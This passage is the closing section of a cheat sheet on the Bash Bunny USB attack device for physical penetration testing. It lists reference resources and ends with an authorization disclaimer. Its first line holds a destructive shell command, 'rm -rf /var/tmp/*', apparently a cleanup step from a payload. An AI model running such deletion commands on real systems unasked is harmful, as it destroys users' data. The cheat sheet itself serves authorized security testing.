rm -rf /var/tmp/*Resources
- Bash Bunny Official Documentation
- Hak5 Community Forums
- Bash Bunny Payload Repository
- Physical Penetration Testing Guide
- USB Security Best Practices
- Social Engineering Toolkit
- Physical Security Assessment Methodology
This cheat sheet provides a comprehensive reference for using the Bash Bunny for physical penetration testing and security assessments. Always ensure you have proper authorization before conducting physical security testing and follow responsible disclosure practices.